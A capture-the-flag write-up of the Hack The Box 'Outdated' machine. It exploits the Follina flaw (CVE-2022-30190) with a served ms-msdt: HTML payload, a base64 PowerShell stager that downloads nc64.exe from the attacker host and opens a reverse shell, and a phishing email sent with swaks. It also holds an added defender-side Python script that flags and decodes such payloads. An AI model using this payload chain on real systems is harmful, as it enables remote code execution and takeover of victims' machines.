CVE-2022-30190 (Follina)


┌──(kali㉿kali)-[~/…/htb/labs/outdated/msdt-follina]
└─$ python3 follina.py --interface tun0 -p 80 --reverse 9999
[+] copied staging doc /tmp/s9ph64ug
[+] created maldoc ./follina.doc
[+] serving html payload on :80
[+] starting 'nc -lvnp 9999' 
listening on [any] 9999 ...

Executing the [[Outdated_CVE-2022-30190#[Exploit](https //github.com/JohnHammond/msdt-follina)|exploit script]] copies the staging document into a temporary directory and hosts the HTML stager from there.

┌──(kali㉿kali)-[~/archive/htb/labs/outdated]
└─$ ll /tmp/s9ph64ug    
total 24K
4.0k drwxr-xr-x  2 kali kali 4.0k jan  5 14:31 www
4.0k drwxr-xr-x  4 kali kali 4.0k jan  5 14:31 .
 12k drwxrwxrwt 27 root root  12k jan  5 14:31 ..
4.0k drwxr-xr-x  5 kali kali 4.0k jan  5 14:01 doc

Like so.

┌──(kali㉿kali)-[~/archive/htb/labs/outdated]
└─$ cat /tmp/s9ph64ug/www/index.html
<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'SW52b2tlLVdlYlJlcXVlc3QgLVVyaSBodHRwOi8vMTAuMTAuMTQuMjM6MjIyMi9uYzY0LmV4ZSAtT3V0RmlsZSBDOlxXaW5kb3dzXHRlbXBcbmM2NC5leGU7IEM6XFdpbmRvd3NcdGVtcFxuYzY0LmV4ZSAtZSBjbWQuZXhlIDEwLjEwLjE0LjIzIDk5OTk='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\""; //shbxvgkqbtwyrcnlwecbiaaxujrqqhucwfjngftogotmjmjhlaubtpvepybkftvwjxagfbfqeemteuizseibtiqeuqvlsenjazivwzizfzteruyguetangpcijkehddyaxjwufmnjbwookrmchxxtxfmxrmpufefwejxnjltxuyfwyztgxrksvnhkfcvvjbhfdhkhrlqkpcjxnxpbekewhqiihbwhtwtrargafbitkakimriuznglanokxskfavbfqliqcxjqtcxmpaogbtctpuydrfjiwpywsjzysgticbpwxmigjfrsnhbrbvcspiwncpuwcwutwrhiagrlzfebjbaxwshubvlcdfqjipatlwytvrjnxnlifxmgucfxqflyreokojvvgpozjfvrhkjgowojytwljfxkiekmxwmxmnxehpzrnkpncdfkepjosxqeejdrkmilvhjqcpvgzhwqbyodehwhpabgtzgslaonegmfhrimgbgmegcrupuhjodqltfezlgixkkkifcszpkjxudcpgnfdywqqpfjfhhcwphxusplwgembrnoukkvvnjtjovtuykyuvvekwsbhgmcopnphpwwilvksqktxtvtvxpqkcncxvmwxcavlphvmvegsmlrvqqkhxkjkfkxghsfiuczsjdldjrtiwbpxffcjzevuiebcenzizoyehsqlqjkgkqdkuoeliljlwzezmbxhfzdmievqilbxamdjedcvvrdxbvwfaixgfyxmixtptmekngiilzlyofcgbbchzkmnhhieimhtvgneqthweozgwydhdnfswhkqlipsbydzljqerbloeogfbjqpwqgyxfzhrmiyobjyqmgdebpovvinuhserwjsbtqqddfnubyuuiktawxgozjkvshqdviwgelghntbicjobjbeohyswhwtfptqfsrbfpesjzcacvqqsuhkcfruuwhlemxshuhxhdngntgcymjfoxqmsvjlucvqvkrscvceeqilruujdvexxemkflhfndyqzjquyvkfhxlswlgkwsfecjsnvssbreipchltbkgxfxpzctuhgcjlsgrzfjhrynsewrpbvywffzxidysrmixuvfvsdkxlqophwiapiudzhabagqwikiolsifxrrbgxhcmqgfgvpttjoboaymojmshghoprpepbvjnvypjyegfbvegvfmyyttirtgjugsisczpjwiiecmgijcyqtnvfsvrkwbjxmxpowlledqegyksvbftvdptqwbiqjonpmrpodvihpmvcnbbaeykgrdslknkkrfdxyjrdmhgijjyzkfjtwwnnofqejagztvzffsqpncnxnfmrwwipoaijhxskxwqnezecojnpggjwqgeoqjcydzrusuokoj
uiflmkxkfyeupdqpghnhduqrthvewxskibasawwjzixanhgylchoshuycqwhgpkqxukkgebkycdlysernwctcjqjoylzpnndboanmwnedcmllbmovqiicwsdxcudjccbjjrazeecgxqbtxujuxjumdyegttwkacstfeliixqdbqvmgypgsauptdialoexkcenstywxiamnupnaujwsmsumtccfvdiuspeaylxivqjhialpqdrpjtfhnbfxfqicqxabuutziazxbscakzifixjhpjwydniemyoknecqlytddahdpaklyyaldewvkumjwkmuvaaepchvhhhoexegjrqwtrrcyrxtncamryzqrjjbkhgvqaqzrqzzmrtytnlhgcosbbttifhdgdxdnrhcqhqikwoljwdwgkfedpstpqsiflbupxunkppdwgxbbxomovgvuauptziwjzyjmmmocqtymayhpxnvifrijpwgycboqdyqpfobhfkaocouozafbpqncgpgjeqbbaoiafcrmryyjppkdgcpeqocqffrojaaqvtdexbokrhruktvwzwyoghchnnwtpptoosxaphsewxdogzljxqyfpwkglxqjjyxjmxqtiavdpjmqabtzaiceqecqjvmljkgicplxjmmuvwoudpnpsoammlyaopwwldqasmzvqioqzyapfjqynzyilceecjiobvrwxotjeymtawpbvaqraxcifauovpvzujsxlcndbuanrvijqyiiszhbpwjsgkhfifswxirqmuncttkkdrrrocxofxhlsugxtieldwgyzgqwkdrcdhdtnmlwzwxxwegiouypvkvefdfnsqzzjfswngvkovgowhsrhlvpxjoksvygleelfpcqmqriswmuizfiyqzrtzqdgpfhyiqmyqyzorvpuohmewyylcjcklbrfipeqqzxfykdoxmkreoolrydnvakpzutsemhqtxhzvapqzgtjfwocobaqjzejweshpzrzhlmkbcpfmathuuwozjkivbrlpeszvukparyspwsoshrzqdevtwkcezxqnqapfjodrcbjacwblanzbwqddzfoxskjdsydyvliuxviadsaabcugjlrimsqxcbwsrywxbwbkziexglqqejixrtcxstfodhdxwerxgatwifdxsgcmggyyyhvpiypbmbytacbadwwbottistzeztdawjgarundupogxtjotdznbsryeonngdmqgjifgioobmdvpxjwhdkiqltvjgmwkigmpwudvhqeqloscvbdoeadbsautzpiqcxykwzlklaetsvrhwlimiosamyhohstzmltfqzxpinchejlwsyavyxggjvmnerregbjppnicglgkdtrjygqhpfcmpcqsazikrlcrxbjunrgubbdqqqhwcgutbnielkvzkmnmtyimgfiugbctataizzngfxktrzrnkluyowrgmiujstlwrdafxxehohzggkgkvadibcwqttierbhkarfvituskqssswebfemtiizgxqvefmbqxkuwxalyyckyoqrukainbrnspcplvjiyoheveluthridcqdjbdvedvadmkcetoonswnwpcxcsgvnapetzhpdwdccqeiznzhrknchevemvjapigveinpsokfpdhcczmdowrdmknkpckujsjskpyrfrdjvdullkbsxemjygirxqddwksgpbgcjttrtwxcqsroelxrifadsfxmshkpzswxiemfcmdeqdvpmsykqzuvjasflqmwxlfeuskfvtgceweaydsrhmtoowwctaqclflwautricnlvhuukthiuzvxobdngopdimmefrswiwpavtydpkzrfwimhnytynuuimphooiosjrlntokqibrowxsofcxzbulgyolhjrcbqfuurtqiegbqbsfvtqslositqgpatvuuogqbardsmrvkrxiewphipqxcaabfasbqmepdbitjmv
rysodqusjcuuswcndzxbttfepefrlcmvtqehcotbcdhgsigjafttdpycfttigurrqsblfntrygmmcbvtmdopkogexzjeuqlevavhvyzvistwosaqixebacvgwtwoeiadnyclcdtdnbavjksnqkgximengwkezyrlybswkzrlcoillfrcdzqcxgcmkjtqlnqjctqwoloadxmsvwfthxpfushdkndeluzjnxaeqrsiohfcnaythqiyxomzgcpwolmfojuwdsvtftqenvjqfmrophofbobcgyxqrgabmmpnhffluvivubkmvjayxbimmvybbdposaltenorsqorptctfkysydergipsmkxoofpsmpdyepgopffejeesnqfhxgadyhcfhqjsgiryenellmttfxdiqgdbfahuygkaeekcdyvxjavkkckziydzqrnxqrvficjuqnmkgmrxftgcdhlpiyvrwmdbkwqmjhavshzspdohfowvalyiretgolfzoizbembhgjibylsystxdbvqqzddjdfnqzjmdiwliuhiaulfzusiyebikfsnipytnrdpmwgfzldpxtsnlenvpbmnmbvwacnuedzasijuzsxkeentiydjkarumzmltosithkevttflbnymcmokiiwhirurjdogmnczkvfinjoeltyzstgabjvddou
</script>

Aside from the arbitrary 4096-byte string appended for AV evasion, the index file contains JavaScript that redirects to an ms-msdt: URL, which invokes the Microsoft Support Diagnostic Tool (msdt.exe) that is assumed to be available on the internal host rendering the page.
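As an added, defender-side example (not part of the original write-up or the follina.py project): a small triage script that flags the ms-msdt: invocation pattern shown above and decodes the base64 embedded in it. The sample HTML is constructed here, and its base64 decodes to a harmless Write-Output command rather than a real payload.

```python
import base64
import re

# Constructed sample modelled on the served index.html above. The embedded
# base64 is generated at runtime from a harmless command, not a real payload.
BENIGN_CMD = "Write-Output follina-test"
BENIGN_B64 = base64.b64encode(BENIGN_CMD.encode()).decode()
SAMPLE_HTML = (
    '<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param '
    '\\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu '
    "IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'"
    "+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+"
    "'FromBase64String('+[char]34+'" + BENIGN_B64 + "'+[char]34+'))'))))"
    'i/../../../../Windows/System32/mpsigstub.exe\\""; //padding</script>'
)

# Base64 literal that follows a FromBase64String( call, possibly separated by
# the [char]34 quote-building trick seen in the page's payload.
B64_RE = re.compile(r"FromBase64String\(.*?'([A-Za-z0-9+/=]{8,})'", re.DOTALL)
TRAVERSAL_RE = re.compile(r"(?:\.\./){3,}")


def find_msdt_indicators(content: str) -> dict:
    """Return the individual Follina-style indicators found in HTML/text content."""
    return {
        "msdt_scheme": bool(re.search(r"ms-msdt:", content, re.IGNORECASE)),
        "diag_package": "PCWDiagnostic" in content,
        # IT_BrowseForFile=$( ... ) is where the injected command expression lives
        "browse_for_file_injection": bool(re.search(r"IT_BrowseForFile=\$\(", content)),
        "path_traversal": bool(TRAVERSAL_RE.search(content)),
        "invoke_expression": bool(re.search(r"Invoke-Expression", content, re.IGNORECASE)),
    }


def decode_embedded_payloads(content: str) -> list:
    """Decode every base64 blob passed to FromBase64String so an analyst can read it."""
    decoded = []
    for match in B64_RE.finditer(content):
        try:
            decoded.append(base64.b64decode(match.group(1)).decode("utf-8", errors="replace"))
        except ValueError:
            pass  # not valid base64; skip rather than abort triage
    return decoded


def is_follina(content: str) -> bool:
    """High-confidence verdict: ms-msdt: scheme plus an injection or traversal marker."""
    ind = find_msdt_indicators(content)
    return ind["msdt_scheme"] and (ind["browse_for_file_injection"] or ind["path_traversal"])


if __name__ == "__main__":
    print(find_msdt_indicators(SAMPLE_HTML))
    print(decode_embedded_payloads(SAMPLE_HTML))
```

Running the same functions over a captured index.html or an extracted document relationship target surfaces the decoded command without executing anything.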

┌──(kali㉿kali)-[~/…/htb/labs/outdated/msdt-follina]
└─$ echo SW52b2tlLVdlYlJlcXVlc3QgLVVyaSBodHRwOi8vMTAuMTAuMTQuMjM6MjIyMi9uYzY0LmV4ZSAtT3V0RmlsZSBDOlxXaW5kb3dzXHRlbXBcbmM2NC5leGU7IEM6XFdpbmRvd3NcdGVtcFxuYzY0LmV4ZSAtZSBjbWQuZXhlIDEwLjEwLjE0LjIzIDk5OTk= | base64 -d
invoke-webrequest -uri http://10.10.14.23:2222/nc64.exe -OutFile C:\Windows\temp\nc64.exe; C:\Windows\temp\nc64.exe -e cmd.exe 10.10.14.23 9999                                                                                                                                        

Then it executes the base64-encoded payload, which in turn fetches nc64.exe served over HTTP on Kali port 2222 and starts a reverse shell back to port 9999.

┌──(kali㉿kali)-[~/…/htb/labs/outdated/msdt-follina]
└─$ swaks --to itsupport@outdated.htb --from qwe@qwe --header "subject: Internal Web App" --body "http://10.10.14.23/" --server $IP
=== trying 10.10.11.175:25...
=== Connected to 10.10.11.175.
<-  220 mail.outdated.htb ESMTP
 -> EHLO kali
<-  250-mail.outdated.htb
<-  250-SIZE 20480000
<-  250-AUTH LOGIN
<-  250 HELP
 -> mail from:<qwe@qwe>
<-  250 OK
 -> rcpt to:<itsupport@outdated.htb>
<-  250 OK
 -> DATA
<-  354 OK, send.
 -> date: Fri, 05 Jan 2024 14:39:45 +0100
 -> to: itsupport@outdated.htb
 -> from: qwe@qwe
 -> subject: Internal Web App
 -> message-id: <20240105143945.129217@kali>
 -> x-mailer: swaks v20201014.0 jetmore.org/john/code/swaks/
 -> 
 -> http://10.10.14.23/
 -> 
 -> 
 -> .
<-  250 Queued (10.734 seconds)
 -> QUIT
<-  221 goodbye
=== Connection closed with remote host.

Using swaks, I send the URL to itsupport@outdated.htb. The automated PowerShell script on the target will, once again, fetch the URL by sending a GET request to it.

There it is.

┌──(kali㉿kali)-[~/…/htb/labs/outdated/msdt-follina]
└─$ python3 follina.py --interface tun0 -p 80 --reverse 9999
[+] copied staging doc /tmp/s9ph64ug
[+] created maldoc ./follina.doc
[+] serving html payload on :80
[+] starting 'nc -lvnp 9999' 
listening on [any] 9999 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.11.175] 49809
Microsoft Windows [Version 10.0.19043.928]
(c) Microsoft Corporation. All rights reserved.
 
c:\Users\btables\AppData\Local\Temp\SDIAG_71a862c0-30ab-4385-903d-574557cf66b4> whoami
 whoami
outdated\btables
 
c:\Users\btables\AppData\Local\Temp\SDIAG_71a862c0-30ab-4385-903d-574557cf66b4> hostname
 hostname
client
 
c:\Users\btables\AppData\Local\Temp\SDIAG_71a862c0-30ab-4385-903d-574557cf66b4> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet:
 
   connection-specific dns suffix  . : 
   ipv4 address. . . . . . . . . . . : 172.16.20.20
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : 172.16.20.1

The payload is executed and a session is established from the 172.16.20.20 host. Initial foothold established on the internal containerized host, client, as the btables user by exploiting [[Outdated_CVE-2022-30190#[CVE-2022-30190](https //msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190) (Follina)|CVE-2022-30190]].